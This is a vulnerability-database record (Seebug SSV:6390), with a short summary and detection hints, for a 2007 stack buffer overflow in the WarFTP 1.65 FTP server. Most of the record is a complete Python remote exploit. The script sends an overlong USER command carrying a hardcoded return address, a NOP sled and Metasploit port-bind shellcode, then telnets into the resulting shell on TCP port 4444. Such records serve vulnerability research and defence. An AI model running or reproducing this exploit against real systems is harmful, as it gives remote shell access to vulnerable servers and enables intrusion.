Description
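No description provided by source. Summarising the record below: it is a Seebug proof-of-concept entry (SSV:6390, published 2007-03-15) for a stack buffer overflow in WarFTP 1.65, triggered by an overlong username (more than 480 bytes) sent with the FTP USER command. The author tested it on Windows 2000 Server SP4 and did not check whether other commands such as PASS are affected. The record lists no CVE (`cvelist` is empty) and its CVSS fields are unpopulated (`cvss` score 0.0 with vector NONE, `cvss2` and `cvss3` empty), which most likely reflects missing metadata rather than low severity. For detection, the behaviour the listing describes is a USER argument several hundred bytes long on the FTP control channel, followed by a new listener on TCP port 4444 on the server.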
{"sourceData": "\n #!/usr/bin/python\r\n#\u00a0Remote\u00a0exploit\u00a0for\u00a0WarFTP\u00a01.65.\u00a0Tested\u00a0on\u00a0Windows\u00a02000\u00a0server\u00a0SP4\u00a0inside\r\n#\u00a0VMware.\u00a0A\u00a0trivially\u00a0exploitable\u00a0stack\u00a0overflow\u00a0is\u00a0present\u00a0in\u00a0WarFTP\u00a0which\r\n#\u00a0can\u00a0be\u00a0triggered\u00a0by\u00a0sending\u00a0a\u00a0long\u00a0username\u00a0(>480\u00a0bytes)\u00a0along\u00a0with\u00a0the\u00a0USER\r\n#\u00a0ftp\u00a0command.\u00a0Maybe\u00a0other\u00a0commands\u00a0like\u00a0PASS\u00a0might\u00a0also\u00a0be\u00a0affected.\u00a0I\u00a0did\r\n#\u00a0not\u00a0check\u00a0though.\u00a0This\u00a0exploit\u00a0binds\u00a0shell\u00a0on\u00a0TCP\u00a0port\u00a04444\u00a0and\u00a0then\r\n#\u00a0connects\u00a0to\u00a0it\r\n#\r\n#\u00a0Author\u00a0shall\u00a0not\u00a0bear\u00a0any\u00a0responsibility\u00a0for\u00a0any\u00a0screw\u00a0ups\r\n#\u00a0Winny\u00a0Thomas\u00a0:-)\r\n\r\nimport\u00a0os\r\nimport\u00a0sys\r\nimport\u00a0time\r\nimport\u00a0socket\r\nimport\u00a0struct\r\n\r\n#\u00a0alphanumeric\u00a0portbind\u00a0shellcode\u00a0from\u00a0metasploit\r\nshellcode\u00a0\u00a0=\u00a0\\"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49\\"\r\nshellcode\u00a0+=\u00a0\\"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36\\"\r\nshellcode\u00a0+=\u00a0\\"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34\\"\r\nshellcode\u00a0+=\u00a0\\"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41\\"\r\nshellcode\u00a0+=\u00a0\\"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e\\"\r\nshellcode\u00a0+=\u00a0\\"x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx58\\"\r\nshellcode\u00a0+=\u00a0\\"x4ex56x46x42x46x42x4bx58x45x54x4ex53x4bx48x4ex57\\"\r\nshellcode\u00a0+=\u00a0\\"x45x30x4ax47x41x30x4fx4ex4bx48x4fx44x4ax51x4bx38\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx55x42x32x41x50x4bx4ex49x44x4bx58x46x33x4bx58\\"\r\nshellcode\u00a0+=\u00a0\\"x41x30x50x4ex41x43x42x4cx49x49x4ex4ax46x48x42x4c\\"\r\nshellcode\u00a0+=\u00a0\\"x46x37x47x30x41x4cx4cx4cx4dx30x41x
30x44x4cx4bx4e\\"\r\nshellcode\u00a0+=\u00a0\\"x46x4fx4bx53x46x35x46x52x4ax42x45x57x45x4ex4bx48\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx45x46x52x41x30x4bx4ex48x46x4bx38x4ex50x4bx54\\"\r\nshellcode\u00a0+=\u00a0\\"x4bx48x4fx45x4ex41x41x30x4bx4ex43x30x4ex32x4bx58\\"\r\nshellcode\u00a0+=\u00a0\\"x49x48x4ex36x46x42x4ex41x41x56x43x4cx41x53x4bx4d\\"\r\nshellcode\u00a0+=\u00a0\\"x46x56x4bx38x43x54x42x43x4bx58x42x44x4ex30x4bx38\\"\r\nshellcode\u00a0+=\u00a0\\"x42x47x4ex41x4dx4ax4bx58x42x44x4ax30x50x55x4ax56\\"\r\nshellcode\u00a0+=\u00a0\\"x50x48x50x34x50x30x4ex4ex42x45x4fx4fx48x4dx48x36\\"\r\nshellcode\u00a0+=\u00a0\\"x43x45x48x56x4ax46x43x53x44x33x4ax46x47x37x43x57\\"\r\nshellcode\u00a0+=\u00a0\\"x44x33x4fx35x46x35x4fx4fx42x4dx4ax36x4bx4cx4dx4e\\"\r\nshellcode\u00a0+=\u00a0\\"x4ex4fx4bx53x42x45x4fx4fx48x4dx4fx35x49x38x45x4e\\"\r\nshellcode\u00a0+=\u00a0\\"x48x46x41x58x4dx4ex4ax30x44x30x45x35x4cx36x44x30\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx4fx42x4dx4ax46x49x4dx49x50x45x4fx4dx4ax47x35\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx4fx48x4dx43x35x43x45x43x55x43x45x43x35x43x34\\"\r\nshellcode\u00a0+=\u00a0\\"x43x55x43x34x43x45x4fx4fx42x4dx48x46x4ax36x41x41\\"\r\nshellcode\u00a0+=\u00a0\\"x4ex45x48x36x43x45x49x58x41x4ex45x39x4ax56x46x4a\\"\r\nshellcode\u00a0+=\u00a0\\"x4cx31x42x37x47x4cx47x45x4fx4fx48x4dx4cx46x42x31\\"\r\nshellcode\u00a0+=\u00a0\\"x41x55x45x55x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42\\"\r\nshellcode\u00a0+=\u00a0\\"x49x4ex47x45x4fx4fx48x4dx43x55x45x35x4fx4fx42x4d\\"\r\nshellcode\u00a0+=\u00a0\\"x4ax36x45x4ex49x54x48x58x49x44x47x55x4fx4fx48x4d\\"\r\nshellcode\u00a0+=\u00a0\\"x42x55x46x35x46x35x45x35x4fx4fx42x4dx43x39x4ax56\\"\r\nshellcode\u00a0+=\u00a0\\"x47x4ex49x47x48x4cx49x37x47x45x4fx4fx48x4dx45x45\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx4fx42x4dx48x46x4cx36x46x56x48x36x4ax46x43x46\\"\r\nshellcode\u00a0+=\u00a0\\"x4dx46x49x58x45x4ex4cx56x42x35x49x55x49x52x4ex4c\\"\r\nshellcode\u00a0+=\u00a0\\"x49x38x47x4ex4cx56x46x54x49x58x44x4ex41x53x42x4c\\"\r\nshellcode\u00a0+=\u00a0\\"x43x4fx4c
x4ax50x4fx44x54x4dx52x50x4fx44x34x4ex32\\"\r\nshellcode\u00a0+=\u00a0\\"x43x49x4dx48x4cx47x4ax33x4bx4ax4bx4ax4bx4ax4ax36\\"\r\nshellcode\u00a0+=\u00a0\\"x44x47x50x4fx43x4bx48x41x4fx4fx45x57x46x34x4fx4f\\"\r\nshellcode\u00a0+=\u00a0\\"x48x4dx4bx45x47x55x44x55x41x45x41x35x41x55x4cx36\\"\r\nshellcode\u00a0+=\u00a0\\"x41x30x41x35x41x55x45x45x41x45x4fx4fx42x4dx4ax56\\"\r\nshellcode\u00a0+=\u00a0\\"x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx56\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx4fx4fx4fx47x33x4fx4fx42x4dx4bx38x47x55x4ex4f\\"\r\nshellcode\u00a0+=\u00a0\\"x43x48x46x4cx46x36x4fx4fx48x4dx44x55x4fx4fx42x4d\\"\r\nshellcode\u00a0+=\u00a0\\"x4ax46x42x4fx4cx48x46x50x4fx45x43x55x4fx4fx48x4d\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx4fx42x4dx5ax90x90x90x90x90x90x90x90x90x90x90\\"\r\n\r\ndef\u00a0ConnectRemoteShell(target):\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0connect\u00a0=\u00a0\\"/usr/bin/telnet\u00a0\\"\u00a0+\u00a0target\u00a0+\u00a0\\"\u00a04444\\"\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0os.system(connect)\r\n\r\ndef\u00a0ExploitFTP(target):\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0sockAddr\u00a0=\u00a0(target,\u00a021)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0tsock\u00a0=\u00a0socket.socket(socket.AF_INET,\u00a0socket.SOCK_STREAM)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0tsock.connect(sockAddr)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0response\u00a0=\u00a0tsock.recv(1024)\r\n\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0#\u00a0At\u00a0the\u00a0time\u00a0of\u00a0overflow\u00a0EBP\u00a0points\u00a0to\u00a0our\u00a0shellcode\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload\u00a0=\u00a0\\"USER\u00a0\\"\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload\u00a0+=\u00a0\\"A\\"\u00a0*\u00a0485\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0#\u00a0Point\u00a0of\u00a0EIP\u00a0overwrite.\u00a0Address\u00a0of\u00a0\\'call\u00a0ebp\\'\u00a0from\u00a0user32.dll\u00a0SP4.\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload\u00a0+=\u00a0struct.pack(\\"<L\\",\u00
a00x77E14709)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload\u00a0+=\u00a0\\"x90\\"\u00a0*\u00a0100\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload\u00a0+=\u00a0shellcode\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload\u00a0+=\u00a0\\"\r\n\\"\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0tsock.send(payload)\r\n\r\nif\u00a0__name__\u00a0==\u00a0\\'__main__\\':\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0target\u00a0=\u00a0sys.argv[1]\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0except\u00a0IndexError:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0print\u00a0\\'Usage:\u00a0%s\u00a0<target>\\'\u00a0%\u00a0sys.argv[0]\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0sys.exit(-1)\r\n\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ExploitFTP(target)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0time.sleep(2)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ConnectRemoteShell(target)\r\n\r\n\u00a0\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-6390", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-6390", "type": "seebug", "viewCount": 8, "references": [], "lastseen": "2017-11-19T22:07:59", "published": "2007-03-15T00:00:00", "cvelist": [], "id": "SSV:6390", "enchantments_done": [], "modified": "2007-03-15T00:00:00", "title": "WarFTP 1.65 (USER) Remote Buffer Overflow Exploit (win2k SP4)", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645300954, "score": 1659785532, "epss": 1678851499}}
{}